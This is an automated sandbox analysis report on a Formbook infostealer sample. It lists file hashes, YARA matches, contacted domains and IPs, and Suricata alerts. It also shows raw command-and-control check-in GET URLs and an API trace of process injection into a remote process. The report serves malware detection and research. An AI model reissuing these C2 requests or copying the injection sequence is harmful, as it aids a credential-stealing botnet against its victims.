popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

jucostam2.1.exe

Formbook NSIS Malicious Library UPX PE File PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 7, 2023, 7:44 a.m. Nov. 7, 2023, 7:50 a.m.
Size 392.8KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 1f6a213c979c6adff88e31e059d2825d
SHA256 1821c32e23ff7a3cfb87213f9299eb280cc0152c4170698ce16c6831b627779b
CRC32 38953C10
ssdeep 6144:U8LxBCXMMCax5IF+1XhKoT/HZrjDwBUgw7h+kQZXjQsompUX2u5cGv5oNiJATqDA:urCabI81XpHZrXdk8sIXv5oNLTqDA
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • NSIS_Installer - Null Soft Installer
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
www.klxcv.xyz
A 198.177.124.40
198.177.124.40
www.merchascarpamici.com
www.zg9tywlubmftzw5ldzmzmzk.com
A 103.224.212.216
103.224.212.216
www.jokergiftcard.buzz
www.xpermate.com
A 77.245.157.73
77.245.157.73
IP Address Status Action
103.224.212.216 Active Moloch
164.124.101.2 Active Moloch
198.177.124.40 Active Moloch
77.245.157.73 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49170 -> 103.224.212.216:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 77.245.157.73:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 198.177.124.40:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 198.177.124.40:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.klxcv.xyz/ju29/?BZR8DR=4JvfAS1R38BLVmeFk9DSiCnJ91CcqWw5bF+8iYbx752X4gk0kHBYwToCGZXoT3c/qcFpSYl1&VRKt=vBZhWH98eHJDbf
suspicious_features GET method with no useragent header suspicious_request GET http://www.xpermate.com/ju29/?BZR8DR=YSdUgFSDvDomRrfxRTc82IB8KvEz5Cudp7FBenL6bBiUULPv2hucH8VGw3UW6gX6WzIP7l0c&VRKt=vBZhWH98eHJDbf
suspicious_features GET method with no useragent header suspicious_request GET http://www.zg9tywlubmftzw5ldzmzmzk.com/ju29/?BZR8DR=eJVNysqPhL/uaCM5mmKlDkK99NL0wUK/QD98X4Xi+tSElCareFrH+cf4EbqdkZtA1uTt8AGh&VRKt=vBZhWH98eHJDbf
request GET http://www.klxcv.xyz/ju29/?BZR8DR=4JvfAS1R38BLVmeFk9DSiCnJ91CcqWw5bF+8iYbx752X4gk0kHBYwToCGZXoT3c/qcFpSYl1&VRKt=vBZhWH98eHJDbf
request GET http://www.xpermate.com/ju29/?BZR8DR=YSdUgFSDvDomRrfxRTc82IB8KvEz5Cudp7FBenL6bBiUULPv2hucH8VGw3UW6gX6WzIP7l0c&VRKt=vBZhWH98eHJDbf
request GET http://www.zg9tywlubmftzw5ldzmzmzk.com/ju29/?BZR8DR=eJVNysqPhL/uaCM5mmKlDkK99NL0wUK/QD98X4Xi+tSElCareFrH+cf4EbqdkZtA1uTt8AGh&VRKt=vBZhWH98eHJDbf
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2148
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2148
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2212
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\kujfc.exe
section {u'size_of_data': u'0x0000d000', u'virtual_address': u'0x00037000', u'entropy': 6.895564080355565, u'name': u'.rsrc', u'virtual_size': u'0x0000ced8'} entropy 6.89556408036 description A section with a high entropy has been found
entropy 0.630303030303 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 2148 called NtSetContextThread to modify thread in remote process 2212
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2620904
registers.edi: 0
registers.eax: 4321552
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000d0
process_identifier: 2212
1 0 0